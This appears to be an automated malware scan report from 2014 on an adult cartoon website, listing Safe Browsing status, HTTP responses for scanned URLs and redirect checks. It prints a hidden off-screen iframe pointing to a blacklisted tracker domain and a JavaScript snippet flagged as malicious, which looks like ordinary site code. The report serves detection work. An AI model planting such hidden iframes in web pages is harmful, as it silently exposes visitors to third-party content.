Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xxxdirtytoons.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xxxdirtytoons.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 17 Jun 2014 12:50:11 GMT Location: http://www.xxxdirtytoons.com/ Server: nginx/1.6.0 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.xxxdirtytoons.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.xxxdirtytoons.com/ | 200 OK Content-Length: 20691 Content-Type: text/html | malicious |
Page code contains blacklisted domain: pilubas.com ...[24034 bytes skipped]... href="http://www.cartoonreality.com/index.html?id=adwe" target=_blank ><img src="http://drawn-cash.com/promotools/cr/banners/2012/700_100_1.gif"></a></center> <div id="footer"> <center><p>Copyright © 2006 - 2014 <a href="http://www.xxxdirtytoons.com/">Dirty Toon Sex and XXX Toon Porn</a></p></center> </div> </div> <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body> <script id='popupJS' src='http://chaturbate.com/creative/im/1.js?c=0&filename=cb_im_str8_240x210_03.gif&height=210&width=240&wm=mBxNZ&tour=Lc8u&track=track'></script> </html> Malicious iFrame found. size: 640x480 src: http://pilubas.com/trackingcode/tracker.php This URL is marked by Google as suspicious <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://chaturbate.com/creative/im/1.js?c=0&filename=cb_im_str8_240x210_03.gif&height=210&width=240&wm=mBxNZ&tour=Lc8u&track=track | 200 OK Content-Length: 3528 Content-Type: text/html | clean |
http://chaturbate.com/creative/im/ | 404 NOT FOUND Content-Length: 19331 Content-Type: text/html | clean |
http://chaturbate.com/jsi18n/ | 200 OK Content-Length: 2372 Content-Type: text/javascript | clean |
http://ccstatic.highwebmedia.com/static/CACHE5/js/936fbae33046.js | 200 OK Content-Length: 118690 Content-Type: application/x-javascript | clean |
http://chaturbate.com/ | 200 OK Content-Length: 99656 Content-Type: text/html | clean |
http://ccstatic.highwebmedia.com/static/CACHE5/js/209e2314bf71.js | 200 OK Content-Length: 1922 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var reload_rooms={delay:90000,on_timeout:function(){$(".endless_page_template").each(function(){var href="";if($(this).attr("data-href")==undefined){href=window.location.href;} else{href=$(this).attr("data-href");} var addchar='?';if(href.indexOf('?')!=-1){addchar='&';} href=href+addchar+$("#filter_search_form").serialize();$(this).load(href);});reload_rooms.schedule_refresh();},schedule_refresh:function(){setTimeout(reload_rooms.on_timeout,reload_rooms.delay);}};$(document).read return true;});$("#filter_search_form input[type='submit']").click(function(){var skey=$("#id_keywords").val();var search_message=interpolate(gettext("Searching for %(skey)s ..."),{skey:skey},true);$(".searching-keyword h1").text(search_message);$(".searching-keyword").show();$(".endless_page_template").load($("#filter_search_form").attr("action")+'?'+$("#filter_search_form").serialize());return false;});}); Antivirus reports:
| ||
http://chaturbate.com/accounts/register/ | 200 OK Content-Length: 28920 Content-Type: text/html | clean |
http://www.googleadservices.com/pagead/conversion.js | 200 OK Content-Length: 9216 Content-Type: text/javascript | clean |
http://chaturbate.com/tipping/free_tokens/ | HTTP/1.1 302 FOUND Connection: close Date: Tue, 17 Jun 2014 12:50:18 GMT Location: http://chaturbate.com/auth/login/?next=/tipping/free_tokens/ Server: nginx/1.5.13 Vary: Cookie, Accept-Language Content-Language: en Content-Type: text/html; charset=utf-8 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: affkey="eJyrVipSslJQUqoFAAwfAk0="; expires=Thu, 17-Jul-2014 12:50:18 GMT; Max-Age=2592000; Path=/ | clean |
http://chaturbate.com/auth/login/?next=/tipping/free_tokens/ | 200 OK Content-Length: 18789 Content-Type: text/html | clean |
http://chaturbate.com/auth/login/ | 200 OK Content-Length: 17474 Content-Type: text/html | clean |
http://chaturbate.com/auth/password_reset/ | 200 OK Content-Length: 17700 Content-Type: text/html | clean |
http://chaturbate.com/female-cams/ | 200 OK Content-Length: 99050 Content-Type: text/html | clean |
http://chaturbate.com/male-cams/ | 200 OK Content-Length: 98591 Content-Type: text/html | clean |
http://chaturbate.com/couple-cams/ | 200 OK Content-Length: 72189 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xxxdirtytoons.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 17 Jun 2014 12:50:11 GMT
Location: http://www.xxxdirtytoons.com/
Server: nginx/1.6.0
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.xxxdirtytoons.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
GET / HTTP/1.1
Host: xxxdirtytoons.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 17 Jun 2014 12:50:11 GMT
Location: http://www.xxxdirtytoons.com/
Server: nginx/1.6.0
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.xxxdirtytoons.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xxxdirtytoons.com
Referer: http://www.google.com/search?q=xxxdirtytoons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xxxdirtytoons.com
Referer: http://www.google.com/search?q=xxxdirtytoons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.